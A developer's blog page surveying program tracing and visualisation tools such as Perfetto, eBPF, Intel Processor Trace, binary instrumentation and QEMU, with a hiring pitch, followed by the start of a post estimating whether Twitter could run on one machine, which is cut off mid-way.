Tristan Hume

All my favorite tracing tools: eBPF, QEMU, Perfetto, new ones I built and more

2023-12-02T00:00:00+00:00

Ever wanted more different ways to understand what’s going on in a program? Here I catalogue a huge variety of tracing methods you can use for varying types of problems. Tracing has been such a long-standing interest (and job) of mine that some of these will be novel and interesting to anyone who reads this. I’ll guarantee it by including 2 novel tracing tools I’ve made and haven’t shared before (look for this: Tooling drop!).

What I see as the key parts of tracing are collecting timestamped data on what happened in a system, and then ideally visualizing it in a timeline UI instead of just as a text log. First I’ll cover my favorite ways of really easily getting trace data into a nice timeline UI, because it’s a superpower that makes all the other tracing tools more interesting. Then I’ll go over ways to get that data, everything from instrumentation to binary patching to processor hardware features.

I’ll also give a real-life example of combining eBPF tracing with Perfetto visualization to diagnose tail latency issues in huge traces by using a number of neat tricks. Look for the “eBPF Example” section.

Note: I’m hiring for my accelerator optimization team at Anthropic! See the bottom of the post for more detail.

Easily visualizing data on a trace timeline

Getting event data onto a nice zoomable timeline UI is way easier than most people think. Here’s my favorite method I do all the time which can take you from logging your data to visualizing it in minutes:

# from:
print("%s: %d %d" % (event_name, timestamp, duration))
# to:
with open('trace.json', 'w') as f:
  f.write("[")
  f.write('{"name": "%s", "ts": %d, "dur": %d, "cat": "hi", "ph": "X", "pid": 1, "tid": 1, "args": {}}\n' %
    (event_name, timestamp, duration))
  f.write("]") # this closing ] isn't actually required

This is the power of the Chromium Event JSON Format. It’s a super simple JSON format that supports a bunch of different kinds of events, and is supported by a lot of different profile visualizer tools.
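As a slightly fuller sketch of the same idea, the helper below writes several complete ("ph": "X") events and lets the json module handle escaping of event names. The function name write_trace and the (name, ts, dur) tuple layout are illustrative choices of mine, and it assumes timestamps and durations are already in microseconds, which is the unit the format uses for ts and dur.

```python
import json

def write_trace(path, events):
    """Write (name, ts_us, dur_us) tuples as Chromium JSON complete events."""
    records = [
        {"name": name, "ts": ts_us, "dur": dur_us, "cat": "hi",
         "ph": "X", "pid": 1, "tid": 1, "args": {}}
        for name, ts_us, dur_us in events
    ]
    with open(path, "w") as f:
        # A plain JSON array of event objects is a valid trace file.
        json.dump(records, f)

if __name__ == "__main__":
    write_trace("trace.json", [("parse", 0, 120), ("render", 150, 900)])
```

Going through json.dump is slower than string formatting, so for very hot logging paths the hand-formatted version above may still be the better fit.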

You can view the resulting tracing files in Google’s Perfetto trace viewer by going to https://ui.perfetto.dev/, or in the older Catapult viewer (which is nicer for some traces) by going to chrome://tracing in Chrome. You can play around with the UI by going to Perfetto and clicking “Open Chrome Example” in the sidebar. Here’s a screenshot showing an event annotated with arguments and flow event arrows:

My coworkers and I do this all the time at work: we whip up trace visualizations for new data sources in under an hour and add them to our growing set of trace tools. We have a Python utility to turn a trace file into a clickable permanently-saved intranet link we can share with coworkers in Slack. This is easy to set up by building a copy of Perfetto and uploading to a file hosting server you control, and then putting trace files on that server and generating links using Perfetto’s ?url= parameter. We also write custom trace analysis scripts by loading the simple JSON into a Pandas dataframe.
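To give a flavour of what such an analysis script can look like, here is a minimal sketch that sums up durations per event name. It uses only the standard library rather than Pandas so that it runs anywhere, the name summarize_durations is made up for this example, and it assumes the trace file is a strictly valid JSON array (closing ] included) of events like the ones written above.

```python
import json
from collections import defaultdict

def summarize_durations(trace_path):
    """Return {event name: (count, total_dur, max_dur)} for complete events."""
    with open(trace_path) as f:
        events = json.load(f)
    stats = defaultdict(lambda: [0, 0, 0])
    for ev in events:
        if ev.get("ph") != "X":
            continue  # only complete events carry a "dur" field
        entry = stats[ev["name"]]
        entry[0] += 1
        entry[1] += ev["dur"]
        entry[2] = max(entry[2], ev["dur"])
    return {name: tuple(entry) for name, entry in stats.items()}
```

Sorting the result by total or max duration is usually the first thing to try when looking for what dominates a trace.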

I like Perfetto as its use of WebAssembly lets it scale to about 10x more events than Catapult (although it gets laggy), and you have the escape hatch of the native backend for even bigger traces. Its SQL query feature also lets you find events and annotate them in the UI using arbitrary predicates, including special SQL functions for dealing with trace stacks.

UI protip: Press ? in Perfetto to see the shortcuts. I use both WASD and CTRL+scroll to move around.

Advanced Format: Fuchsia Trace Format

The Chromium JSON format can produce gigantic files and be very slow for large traces, because it repeats both the field names and string values for every event. Perfetto also supports the Fuchsia Trace Format (FTF) which is a simple compact binary format with an incredible spec doc that makes it easy to produce binary traces. It supports interning strings to avoid repeating event names, and is designed around 64-bit words and supports clock bases so that you can directly write timestamp counters and have the UI compute the true time.
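To see why interning matters so much, here is a rough sketch comparing the JSON encoding with a toy binary encoding that stores each distinct event name once. The layout is hypothetical and deliberately simplified, it is not the real FTF record layout (read the spec for that), and encode_interned is a name invented for this example.

```python
import json
import struct

def encode_interned(events):
    """Pack (name, ts, dur) events with each distinct name stored only once.

    Hypothetical layout, NOT real FTF: a string table of
    (u16 length + UTF-8 bytes) entries, then one 24-byte record per event
    made of three little-endian 64-bit words: name index, ts, dur.
    """
    table = {}             # name -> index into the string table
    strings = bytearray()
    records = bytearray()
    for name, ts, dur in events:
        if name not in table:
            table[name] = len(table)
            raw = name.encode("utf-8")
            strings += struct.pack("<H", len(raw)) + raw
        records += struct.pack("<QQQ", table[name], ts, dur)
    return bytes(strings), bytes(records)

events = [("handle_request", i * 100, 40) for i in range(1000)]
strings, records = encode_interned(events)
json_size = len(json.dumps(
    [{"name": n, "ts": t, "dur": d, "ph": "X", "pid": 1, "tid": 1}
     for n, t, d in events]))
binary_size = len(strings) + len(records)
print(json_size, binary_size)
```

Even this naive version spends a fixed 24 bytes per event regardless of how long the name is, while the JSON repeats the name and every field name each time.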

When I worked at Jane Street I used this to log instrumentation events to a buffer directly in FTF as they occurred in <10ns per span (it would have been closer to 4ns if it wasn’t for OCaml limitations).

Advanced Format: Perfetto Protobuf

Another format which is similarly compact, and also supports more features, is Perfetto’s native Protobuf trace format. It’s documented only in comments in the proto files and is a bit trickier to figure out, but might be a bit easier to generate if you have access to a protobuf library. It enables access to advanced Perfetto features like including callstack samples in a trace, which aren’t available with other formats. It’s slower to write than FTF, although Perfetto has a ProtoZero library to make it somewhat faster.

This can be really tricky to get right though, and I had to reference the Perfetto source code a lot to figure out error codes in the “info and stats” tab. The biggest gotchas are that you need to set trusted_packet_sequence_id on every packet, have a TrackDescriptor for every track, and set sequence_flags=SEQ_INCREMENTAL_STATE_CLEARED on the first packet.

Other tools

Some other nice trace visualization tools are Speedscope which is better for a hybrid between profile and trace visualization, pprof for pure profile call graph visualization, and Rerun for multimodal 3D visualization. Other profile viewers I like less but which have some nice parts include Trace Compass and the Firefox Profiler.

Tracing Methods

Now let’s go over all sorts of different neat tracing methods! I’ll start with some obscure and interesting low level ones but I promise I’ll get to some more broadly usable ones after.

Hardware breakpoints

For ages, processors have supported hardware breakpoint registers which let you put in a small number of memory addresses and have the processor interrupt itself when any of them are accessed or executed.

perf and perftrace

Linux exposes this functionality through ptrace but also through the perf_event_open syscall and the perf record command. You can record a process like perf record -e \mem:0x1000/8:rwx my_command and view the results with perf script. It costs about 3us of overhead every time a breakpoint is hit.

Tooling drop! I wrote a tiny Python library called perftrace with a C stub which calls the perf_event_open syscall to record timestamps and register values when the breakpoints were hit.

It currently only supports execution breakpoints but you can also breakpoint on reads or writes of any memory and it would be easy to modify the code to do that. Hardware breakpoints are basically the only way to watch for accessing a specific memory address at a fine granularity which doesn’t add overhead to code which doesn’t touch that memory.

GDB scripting

In addition to using it manually, you can automate the process of following the execution of a program using debugger breakpoints by using GDB’s Python scripting interface. This is slower than perf breakpoints but gives you the ability to inspect and modify memory when you hit breakpoints. GEF is an extension to GDB that in addition to making it much nicer in general, also extends the Python API with a bunch of handy utilities.

Tooling drop! Here’s an example GDB script I wrote using GEF which gives examples of how to puppeteer, trace and inspect a program

Intel Processor Trace

Intel Processor Trace is a hardware technology on Intel chips since Skylake which allows recording a trace of every instruction the processor executes via recording enough info to reconstruct the control flow in a super-compact format, along with fine-grained timing info. It has extremely low overhead since it’s done by hardware and writes bypass the cache so the only overhead is reducing main memory bandwidth by about 1GB/s. I see no noticeable overhead at all on most program benchmarks I’ve tested.

You can access a dump of the assembly instructions executed in a recorded region using perf, lldb and gdb.

magic-trace

However assembly traces aren’t useful to most people, so when at Jane Street I created magic-trace along with my intern Chris Lambert, which generates a trace file (using FTF and Perfetto as described above) which visualizes every function call in a program execution. Jane Street generously open-sourced it so anyone can use it! Since then it’s been extended to support tracing into the kernel as well. I wrote a blog post about how it works for the Jane Street tech blog.

Processor Trace can record to a ring buffer, and magic-trace uses the hardware breakpoint feature described earlier to let you trigger capture of the last 10ms whenever some function that signals an event you want to look at happened, or when the program ends. This makes it great for a bunch of scenarios:

Debugging rare tail latency events: Add a trigger function call after something takes unusually long, and then leave magic-trace attached in production. Because it captures everything you’ll never have not logged enough data to identify the slow part.
Everyday performance analysis: A full trace timeline can be easier to interpret than a sampling profiler visualization, especially because it displays the difference between a million fast calls to a function and one slow call.
- It’s typical to find performance problems on systems that had only ever been analyzed with a sampling profiler by noticing the first time you magic-trace the program that many functions are being called more times than expected or in locations you didn’t expect.
Debugging crashes: When a program crashes for reasons you don’t understand, you can just run it under magic-trace and see every function call leading up to the crash, which is often enough to figure out why the crash happened without adding extra logging or using a debugger!

If you want to modify magic-trace to suit your needs, it’s open-source OCaml. And if you like Rust more than OCaml someone made a simple Rust port called perf2perfetto.

Unfortunately, Processor Trace isn’t supported on many virtual machines that use compatible Intel Hardware. Complain to your cloud provider to add support in their hypervisor or try bare-metal instances!

Instrumentation-based tracing profilers

What most people use to get similar benefits to magic-trace traces, especially in the gamedev industry, is low-overhead instrumentation-based profilers with custom UIs. One major advantage of instrumentation-based traces is they can contain extra information about data and not just control flow: putting arguments from your functions into the trace can be key for figuring out what’s going on. These tools often support including other data sources such as OS scheduling info, CPU samples and GPU trace data. Here are my favorite tools like this and their pros/cons:

Tracy

Cross platform, including good Linux sampling and scheduling capture
Overhead of only 2ns/span, supports giant traces with hundreds of millions of events
Really nice and fast UI with tons of features (check out the demo videos in the readme)
Integrates CPU sampling with detailed source and assembly analysis
Popular so there are bindings in non-C++ languages like Rust and Zig.
Con: Only supports a single string/number argument to events
Con: Timeline is overly aggressive in collapsing small events into squiggles (see my post on this).

Optick

Cross-platform, lots of features, very nice UI
Supports multiple named arguments per event
Con: Not as fleshed-out for non-game applications
Con: sampling integration only works on Windows

Perfetto

Perfetto UI is nice, events can include arguments and flow event arrows
Integrates with other Perfetto data sources like OS events and sampling
Con: Higher overhead of around 600ns/span when tracing enabled
Con: UI doesn’t scale to traces as large as the above two programs

Other programs

There’s a bunch more similar small programs that generally come with their own instrumentation library and their own WebGL profile viewer. These are generally more lightweight and can be easier to integrate. For example Spall, microprofile, Remotery, Puffin (Rust-native), gpuviz. I must also mention the OCaml tracing instrumentation library I wrote for Jane Street which has overheads under 10ns/span via a compile-time macro like the C++ libraries.

eBPF

If you want to trace things using the Linux kernel there’s a new game in town, and it’s awesome. The eBPF subsystem allows you to attach complex programs to all sorts of different things in the kernel and efficiently shuttle data back to userspace, basically subsuming all the legacy facilities like ftrace and kprobes such that I won’t talk about them.

Things you can trace include: syscalls, low overhead tracepoints throughout the kernel, hardware performance counters, any kernel function call and arbitrary breakpoints or function calls/returns in userspace code. Combined these basically let you see anything on the system in or out of userspace.

You normally write BPF programs in C but there are perhaps even nicer toolkits for using Zig and Rust.

There’s a whole bunch of ways to use eBPF and I’ll talk about some of my favorites here. Some other favorites I won’t go into in detail are Wachy and retsnoop.

BCC: Easy Python API for eBPF

The BPF Compiler Collection (BCC) is a library with really nice Python bindings for compiling eBPF programs from C source code, injecting them, and getting the data back. It has a really nice feature where you can write a C struct to hold the event data you want to record, and then it will parse that and expose it so you can access the fields in Python. Check out how simple this syscall tracing example is.

I really like having the full power of Python to control my tracing scripts. BCC scripts often use Python string templating to do compile time metaprogramming of the C to compose the exact probe script you want, and then do data post-processing in Python to present things nicely.

bpftrace: terse DSL for eBPF tracing

If you want a terser way to compose tracing programs, in the style of dtrace, check out bpftrace. It lets you write one liners like these:

# Files opened by process
bpftrace -e 'tracepoint:syscalls:sys_enter_open { printf("%s %s\n", comm, str(args->filename)); }'

# Count LLC cache misses by process name and PID (uses PMCs):
bpftrace -e 'hardware:cache-misses:1000000 { @[comm, pid] = count(); }'

ply: simpler bpftrace

If you want something like bpftrace but simpler and faster with no LLVM dependencies, check out ply.

# Which processes are receiving errors when reading from the VFS?
ply 'kretprobe:vfs_read if (retval < 0) { @[pid, comm, retval] = count(); }'

eBPF Example: Anthropic’s Perfetto-based packet and user event tracing

For work at Anthropic I wanted to analyze tail latency of some networking code so I used BCC and hooked into low-overhead kernel probe points to trace info from every single packet into a ring buffer. I could even include fields pulled from the packet header and NIC queue information, all at 1 million packets per second with no noticeable overhead.

Trick for tracing userspace events with low overhead in eBPF

I wanted to correlate packets with userspace events from a Python program, so I used a fun trick: Find a syscall which has an early-exit error path and bindings in most languages, and then trace calls to that which have specific arguments which produce an error. I traced the faccessat2 syscall such that in Python os.access(event_name, -932, dir_fd=-event_type) where event_type was an enum for start, stop and instant events would log spans to my Perfetto trace. This had an overhead of around 700ns/event, which is in a similar league to Perfetto’s full-userspace C++ instrumentation, and a lot of that is Python call overhead. The os.access function is especially good because when the syscall errors it doesn’t incur overhead by generating a Python exception like most other syscall wrappers do.
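The userspace half of that trick can be sketched as below. The EventType values and the emit_event helper are assumptions for illustration (the post only says event_type was an enum for start, stop and instant events), and the eBPF probe that recognises the magic mode on the kernel side is not shown.

```python
import os
from enum import IntEnum

class EventType(IntEnum):
    # Assumed numbering. Starting at 1 keeps -event_type from ever being 0,
    # which would be a real file descriptor (stdin).
    START = 1
    STOP = 2
    INSTANT = 3

MAGIC_MODE = -932  # not a valid access mode, so the syscall fails right away

def emit_event(event_name, event_type):
    """Issue the marker syscall. It is expected to fail, so this returns False."""
    return os.access(event_name, MAGIC_MODE, dir_fd=-int(event_type))

emit_event("send_batch", EventType.START)
# ... the work being timed goes here ...
emit_event("send_batch", EventType.STOP)
```

Because os.access reports failure as a plain False, nothing needs to be caught or ignored on the Python side, which is part of why the overhead stays low.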

How to process events more quickly using a C helper with BCC

With 1 million packets per second I had a problem that with rare tail latency events, my traces quickly got huge and lagged Perfetto. I wanted to only keep data from shortly before one of my userspace send events took too long. Normally you’d do this with a circular buffer that gets snapshotted, and it would be possible to implement that in eBPF. But I didn’t want to implement my own ringbuf and the included ones don’t support wraparound overwriting. So instead I used the internal _open_ring_buffer function to register a ctypes C function as a ringbuffer callback instead of a Python function, and wrote an efficient C callback to pick out only the packets near a tail latency event before passing those to Python.
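The general "keep a rolling window and snapshot it when something slow happens" idea can be sketched in plain Python as follows. This is not the C callback described above, just an illustration of the filtering logic, and the class name, method names and nanosecond units are all assumptions made for the example.

```python
from collections import deque

class TailLatencyRecorder:
    """Keep only events from the window leading up to the end of a slow span."""

    def __init__(self, window_ns, slow_threshold_ns):
        self.window_ns = window_ns
        self.slow_threshold_ns = slow_threshold_ns
        self.recent = deque()   # (timestamp_ns, payload), oldest first
        self.kept = []          # events snapshotted around slow spans

    def on_packet(self, ts_ns, payload):
        self.recent.append((ts_ns, payload))
        # Drop anything older than the window so memory stays bounded.
        while self.recent and self.recent[0][0] < ts_ns - self.window_ns:
            self.recent.popleft()

    def on_span_end(self, start_ns, end_ns):
        """Snapshot the buffer if the span was slow. Returns True if kept."""
        if end_ns - start_ns < self.slow_threshold_ns:
            return False
        self.kept.extend(self.recent)
        self.recent.clear()
        return True
```

The window should be chosen comfortably larger than the slow threshold, otherwise the packets from the start of a slow span will already have been evicted by the time it ends.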

Perks of Perfetto visualization

I used the Perfetto Protobuf format with interned strings in order to keep trace size down to a few bytes per packet.

I could use Perfetto’s SQL support in the resulting trace to query for send events above a certain time threshold after startup in a specific process. Here’s a screenshot showing a long send event coinciding with packets starting to be paced out with larger gaps on one of the queues, including the ability to have line graph tracks:

I think it’s kinda crazy that we have all these different mostly-text-based BPF tools rather than a framework that lets you put all sorts of different kinds of system events into a trace UI, including easily scripting your own new events. It’s so much easier to investigate this kind of thing with a timeline UI. I started building that framework at Anthropic, but only spent a week on it since I’ve had higher priority things to do since I did the packet latency investigation.

Binary Instrumentation

When you’re instrumenting userspace programs in a way where the overhead of kernel breakpoints is too high, but you don’t have access to the source code, perhaps because you’re reverse-engineering something, then it may be time for binary instrumentation.

bpftime: eBPF-based binary instrumentation

One easy way that’s a good segue is bpftime which takes your existing eBPF programs with userspace probes, and runs them much faster by patching the instructions to run the BPF program inside the process rather than incurring 3us of kernel interrupt overhead every time.

E9Patch

For more sophisticated binary patching on x86, look to E9Patch.

On some architectures, patching can be really easy since you just patch the instruction you want to trace with a jump to a piece of “trampoline” code which has your instrumentation, and then the original instruction and a jump back.

It’s much harder on x86 since instructions are variable length, so if you just patch a jump over a target instruction, occasionally that’ll cause problems since some other instruction jumps to an instruction your longer jump had to stomp over.

People have invented all kinds of clever tricks to get around these issues including “instruction punning” where you put your patch code at addresses which are also valid x86 nop or trap instructions. E9Patch implements very advanced versions of these tricks such that the patching should basically always work.

It comes with an API as well as a tool called E9Tool which lets you patch using a command line interface:

# print all jump instructions in the xterm binary
$ e9tool -M jmp -P print xterm
jz 0x4064d5
jz 0x452c36
...

Frida

The other way to get around the difficulty of static patching, when you have to be conservative around how jumps you don’t know about could be messed up by your patches, is dynamic binary instrumentation, where you basically puppeteer the execution of the program. This is the technique used by JIT VMs like Rosetta and QEMU to basically recompile your program as you run it.

Frida exposes this incredibly powerful technique in a general way you can script in JavaScript using its “Stalker” interface, allowing you to attach JS snippets to pieces of code or rewrite the assembly as it is run. It also lets you do more standard patching, although it doesn’t work as well on x86 as E9Patch.

LD_PRELOAD

If you just want to trace a function in a dynamic library like libc, you can use LD_PRELOAD to inject a library of your own to replace any functions you like. You can use dlsym(RTLD_NEXT, "fn_name") to get the old implementation in order to wrap it. Check out this tutorial post for how.

Distributed Tracing

Distributed Tracing is where you can trace across different services via attaching special headers to requests and sending all the timing data back to a trace server. Some popular solutions are OpenTelemetry (of which there are many implementations and UIs) and Zipkin.

There’s some cool new solutions like Odigos that use eBPF to add distributed tracing support without any instrumentation.

Sampling Profilers

Sampling profilers take a sample of the full call stack of your program periodically. Typical profiler UIs don’t have the time axis I’d think of as part of “tracing”, but some UIs do. For example Speedscope accepts many profiler data formats and can visualize with a time axis, and Samply is an easy to use profiler which uses the Firefox Profiler UI, which also has a timeline view.

One neat sampling method used by py-spy and rbspy is to use the process_vm_readv syscall to read memory out of a process without interrupting it. If like an interpreter the process stores info about what it’s doing in memory, this can allow you to follow it with no overhead on the target process. You could even use this trick for low-overhead native program instrumentation: set up a little stack data structure where you push and pop pointers to span names or other context info, and then sample it from another program when needed using eBPF or process_vm_readv.

QEMU Instrumentation

When all other tracing tools fail, sometimes you have to fall back on the most powerful tool in the tracing toolbox: Full emulation and hooking into QEMU’s JIT compiler. This theoretically allows you to trace and patch both control flow and memory, in both userspace and the kernel, including snapshot and restore, across many architectures and operating systems.

However, actually doing this is not for the faint of heart and the tooling for it only barely exists.

Cannoli

Cannoli is a tracing engine for qemu-user (so no kernel stuff) which patches QEMU to log execution and memory events to a high-performance ringbuffer read by a Rust extension you compile. This lets it trace with very low overhead by spreading the load of following the trace over many cores, at the cost of not being able to modify the execution.

It’s a bit tricky to use, you have to compile QEMU and Cannoli yourself at the moment, and it’s kind of a prototype so when I’ve used it in the past for CTFs I’ve often had to add new features to it.

QEMU TCG Plugins

QEMU has recently added plugin support for its TCG JIT. Like Cannoli this is read-only for now, and it’s likely slower than Cannoli, but it works in qemu-system mode and exposes slightly different functionality.

usercorn

My friend has an old project called usercorn that is mostly bitrotted but has the ability to trace programs using QEMU and analyze them with Lua scripts and all sorts of fancy trace analysis. Someone (possibly him eventually) could theoretically revive it and rebase it on top of something like QEMU TCG plugins.

Conclusion: If you liked this you may like my team at Anthropic

If you made it to the bottom and enjoyed all those different tracing strategies, you may also be interested in working on my team!

I lead the performance optimization team at Anthropic (we build one of the world’s leading large language models, and have a heavy focus on figuring out how future more powerful models can go well for the world). We’ll be doing accelerator kernel optimization across GPUs, TPUs and Trainium. TPUs and Trainium are cool in that they’re simpler architectures where optimization is more like a cycle-counting puzzle, and they also have amazing tracing tools. Almost nobody knows these new architectures, so we’re currently hiring high potential people with other kinds of low-level optimization experience who are willing to learn.

I plan for us to do a bunch of optimization work as compiler-style transformation passes over IRs, but simpler via being bespoke to the ML architecture we’re optimizing. These will parallelize architectures across machines, within a machine, and within a chip in similar ways. We also work closely with an amazing ML research team to do experiments together and come up with architectures that jointly optimize for ML and hardware performance.

Anthropic recently received ~$6B in funding commitments, and are investing it heavily in compute. We currently have ~5 performance specialists, with each one making an immense contribution in helping us have models that exhibit interesting capabilities for our alignment research and policy teams.

AI now is still missing a lot, but progress is incredibly fast. It’s hard for me to say the coming decade of progress won’t lead to AI as good as us at nearly all jobs, which would be the biggest event in history. Anthropic is unusually full of people who joined because they really care about ensuring this goes well. I think we have the world’s best alignment, interpretability research, and AI policy teams, and I personally work on performance optimization here because I think it’s the best way to leverage my comparative advantage to help the rest of our efforts succeed at steering towards AI going well for the world in the event it keeps up this pace.

If you too would like to do fun low-level optimization on what I think will be the most important technology of this decade and want to chat: Email me at tristan@anthropic.com with a link or paragraph about the most impressive low-level or performance thing you’ve done. And feel free to check out some of my other performance writing.

Production Twitter on One Machine? 100Gbps NICs and NVMe are fast

2023-01-02T00:00:00+00:00

In this post I’ll attempt the fun stunt of designing a system that could serve the full production load of Twitter with most of the features intact on a single (very powerful) machine. I’ll start by showing off a Rust prototype of the core tweet distribution data structure handling 35x full load by fitting the hot set in RAM and parallelizing with atomics, and then do math around how modern high-performance storage and networking might let you serve a close-to-fully-featured Twitter on one machine.

I want to be clear this is meant as educational fun, and not as a good idea, at least going all the way to one machine. In the middle of the post I talk about all the alternate-universe infrastructure that would need to exist before doing this would be practical. There’s also some features which can’t fit, and a lot of ways I’m not really confident in my estimates.

I’ve now spent about a week of evenings and 3 weekends doing research, math and prototypes, gradually figuring out how to fit more and more features (images?! ML?!!) than I initially thought I could fit. We’ll start with the very basics of Twitter and then go through gradually more and more features, in what I hope will be a fascinating tour of an alternative world of systems design where web apps are built like high performance trading systems. I’ll also analyze the minimum cost configuration using multiple more practical machines, and talk about the practical disadvantages and advantages of such a design.

Here’s an overview of the features I’ll talk about and whether I think they could fit:

Timeline and tweet distribution logic: Based on a prototype, fits easily on a handful of cores when you pack recent tweets in RAM supplemented with NVMe.
HTTP(S) request serving: Yes. HTTP fits, HTTPS fits only because of session resumption.
Image serving: A close fit with rough estimates, but maybe doable with multiple 100Gbit/s networking cards. You need effort to avoid extreme bandwidth costs.
Video, search, ads, notifications: Probably these wouldn’t fit, and it’s really tricky to estimate whether they might.
Historical tweet and image storage: Tweets fit on a specialized server, but images don’t; you could fit maybe 4 months of images with a 48x HDD storage pod.
ML-based timeline: A100 GPUs are insane and can run a decent LM against every tweet and dot-product the embeddings with every user.

Let’s get this unhinged answer to a common systems design interview question started!

Core Tweet Distribution

Let’s start with the original core of Twitter: Users posting text-based tweets to feeds which others follow with a chronological timeline. There’s basically two ways you could do this:

The timeline page pulls tweets in reverse-chronological order from each follow until enough tweets are found, using a heap to merge them. This requires retrieving a lot of tweets from different feeds, the challenge is making that fast enough.
Each tweet gets pushed into cached timelines. Pushing tweets might be faster than retrieving them in some designs, and so this might be worth the storage. But celebrity tweets have huge fanout so either need background processing or to be separately merged in, but you need a backup merge anyways in case a range of timeline isn’t cached.
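The first (pull) approach can be sketched in a few lines of Python using the standard library's heap-based merge. The data layout here (a dict of per-user lists of (timestamp, text) tuples, newest first) and the function name merged_timeline are illustrative assumptions, not how the prototype later in the post stores things.

```python
import heapq
from itertools import islice

def merged_timeline(feeds, following, limit):
    """Pull approach: merge the newest tweets of every followed feed.

    feeds maps user id -> list of (timestamp, text), newest first.
    """
    per_feed = (feeds.get(user, []) for user in following)
    # heapq.merge keeps one cursor per feed in a heap and yields lazily,
    # so it stops consuming the feeds once `limit` tweets have come out.
    newest_first = heapq.merge(*per_feed, key=lambda t: t[0], reverse=True)
    return list(islice(newest_first, limit))

feeds = {
    1: [(50, "a3"), (20, "a2"), (10, "a1")],
    2: [(40, "b2"), (30, "b1")],
    3: [(60, "c1")],
}
print(merged_timeline(feeds, following=[1, 2], limit=3))
# prints [(50, 'a3'), (40, 'b2'), (30, 'b1')]
```

The cost is dominated by touching one feed per followed account, which is exactly the retrieval step that has to be made fast for this approach to work.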

The systems design interview answers I can find take the second approach because merging from the database on pageload would be too slow with typical DBs. They use some kind of background queue to do the tweet fanout writing into a sharded timeline cache like a Redis cluster.

I’m not sure how real Twitter works but I think based on Elon’s whiteboard photo and some tweets I’ve seen by Twitter (ex-)employees it seems to be mostly the first approach using fast custom caches/databases and maybe parallelization to make the merge retrievals fast enough.

How big is Twitter?

When you’re not designing your systems to scale to arbitrary levels by adding more machines, it becomes important what order of magnitude the numbers are, so let’s try to get good numbers.

So, how many tweets do we need to store? This Twitter blog post from 2013 gives figures for daily and peak rates, but those numbers are pretty old.

Through intense digging I found a researcher who left a notebook public including tweet counts from many years of Twitter’s 10% sampled “Decahose” API and discovered the surprising fact that tweet rate today is around the same as or lower than 2013! Tweet rate peaked in 2014 and then declined before reaching new peaks in the pandemic. Elon recently tweeted the same 500M/day number which matches the Decahose notebook and 2013 blog post, so this seems to be true! Twitter’s active users grew the whole time so I think this reflects a shift from a “posting about your life to your friends” platform to an algorithmic content-consumption platform.

I did all my calculations for this project using Calca (which is great although buggy, laggy and unmaintained. I might switch to Soulver) and I’ll be including all calculations as snippets from my calculation notebook.

First the public top-line numbers:

daily active users = 250e6 => 250,000,000

avg tweet rate = 500e6/day in 1/s => 5,787.037/s

The Decahose notebook (which ends March 2022) suggests that tweet rate averages out pretty well at the level of a full day: the peak days ever in the dataset (during the pandemic lockdown in 2020) only have about 535M tweets compared to 340M before the lockdown surge.

traffic surge ratio = 535e6 / 340e6 => 1.5735

max sustained tweet rate = avg tweet rate * traffic surge ratio  => 9,106.073/s

The maximum tweet record is probably still the 2013 Japanese TV airing; Elon said only 20k/second for the recent world cup.

max tweet rate = 150,000/second => 150,000/second
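For anyone who wants to check these rate numbers without Calca, the same arithmetic can be reproduced in Python. The variable names simply mirror the notebook lines above, and the final ratio of peak to average rate is an extra derived figure that isn't in the notebook.

```python
SECONDS_PER_DAY = 24 * 60 * 60

avg_tweet_rate = 500e6 / SECONDS_PER_DAY            # tweets per second
traffic_surge_ratio = 535e6 / 340e6                 # peak day vs. pre-lockdown day
max_sustained_tweet_rate = avg_tweet_rate * traffic_surge_ratio
max_tweet_rate = 150_000                            # per second, 2013 record

print(f"{avg_tweet_rate:,.3f}/s")                   # 5,787.037/s
print(f"{traffic_surge_ratio:.4f}")                 # 1.5735
print(f"{max_sustained_tweet_rate:,.3f}/s")         # 9,106.073/s
# Extra derived figure: how far the record burst is above the daily average.
print(f"{max_tweet_rate / avg_tweet_rate:.1f}x")
```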

Now we need to figure out how much data that is. Tweets can fit a maximum of 560 bytes but probably almost all Tweets are shorter than that and we can either use a variable length encoding or a fixed size with an escape hatch to a larger structure for unusually large tweets. One dataset I tried suggested an average length close to 80 characters, but that was maybe from before the tweet length expansion so let's use a larger number to be safe and allow a fixed size encoding with escape hatch.

tweet content max size = 560 byte

tweet content avg size = 140 byte

Tweets also have metadata like a timestamp and also some numbers we may want to cache for display such as like/retweet/view counts. Let's guess some field counts.

metadata size = 2*8 byte + 5 * 4 byte => 36 byte

Now we can use this to compute some sizes for both historical storage and a hot set using fixed-size data structures in a cache:

tweet avg size = tweet content avg size + metadata size => 176 byte

tweet storage rate = avg tweet rate * tweet avg size in GB/day => 88 GB/day

tweet storage rate * 1 year in TB => 32.1413 TB

tweet content fixed size = 284 byte

tweet cache rate = (tweet content fixed size + metadata size) * max sustained tweet rate in GB/day => 251.7647 GB/day

Let's guess the hot set that almost all requests hit is maybe 2 days of tweets. Not all tweets in people's timeline requests will be <2 days old, but also many tweets aren't seen very much so won't be in the hot set.

tweet cache size = tweet cache rate * 2 day in GB => 503.5294 GB

We also need to store the following graph for all users so we can retrieve from the cache. I need to completely guess a probably-overestimated average following count to do this.

avg following = 400

graph size = avg following * daily active users * 4 byte in GB => 400 GB
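For readers without Calca, here is a hedged Rust sketch of the same sizing arithmetic. The helper names are hypothetical, and it assumes decimal gigabytes (1e9 bytes), which is what the figures above imply.

```rust
const SECONDS_PER_DAY: f64 = 86_400.0;
const GB: f64 = 1e9; // decimal gigabytes, which is what the figures above imply

/// Bytes written per day by `rate_per_s` records of `record_bytes` each.
fn bytes_per_day(rate_per_s: f64, record_bytes: f64) -> f64 {
    rate_per_s * record_bytes * SECONDS_PER_DAY
}

/// Bytes for a follow graph storing one 4-byte user index per follow edge.
fn graph_bytes(users: f64, avg_following: f64) -> f64 {
    users * avg_following * 4.0
}

fn main() {
    let metadata = 2.0 * 8.0 + 5.0 * 4.0; // two 8-byte fields plus five 4-byte fields
    let avg_rate = 500e6 / SECONDS_PER_DAY;
    let sustained_rate = avg_rate * 535e6 / 340e6;

    // Historical storage uses the average content size, the cache uses the fixed size.
    let storage = bytes_per_day(avg_rate, 140.0 + metadata);
    let hot_set = 2.0 * bytes_per_day(sustained_rate, 284.0 + metadata);
    println!("tweet storage rate: {:.1} GB/day", storage / GB);
    println!("tweet cache size: {:.1} GB", hot_set / GB);
    println!("graph size: {:.1} GB", graph_bytes(250e6, 400.0) / GB);
}
```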

I think the main takeaway looking at these calculations is that many of these numbers are small numbers on the scale of modern computers!

Hot set in RAM, rest on NVMe

Given those numbers, I’ll be using the “your dataset fits in RAM” paradigm of systems design. However it’s a little more complicated since our dataset doesn’t actually fit in RAM.

